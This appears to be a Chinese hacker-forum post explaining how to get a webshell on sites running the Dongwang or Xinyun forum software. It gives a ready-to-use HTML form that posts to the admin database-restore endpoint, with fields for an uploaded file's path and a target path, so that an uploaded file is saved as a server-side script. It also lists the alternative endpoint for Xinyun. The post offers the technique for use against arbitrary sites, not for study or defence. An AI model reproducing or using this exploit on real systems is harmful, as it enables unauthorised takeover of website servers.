我看了那篇用新云XSS漏洞拿WEBSHELL的文章感概很多............
那方法很好用.........但有点被动.........所以我要化被动为主动..........
方法很简单.........本地提交数据......
代码如下
<form action="
www.*.com/admin/data.asp?action=RestoreData&act=Restore" method>
<p>已上传的文件位置 <input name="Dbpath" type="text" size="80"></p>
<p>要保存的文件位置 <input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>
其实是因为动网和新云互相抄袭...........所以有用.
以上代码是动网搞的..........
如果是新云就把admin/data.asp?action=RestoreData&act=Restore换为
admin/admin_database.asp?action=RestoreData&act=Restore
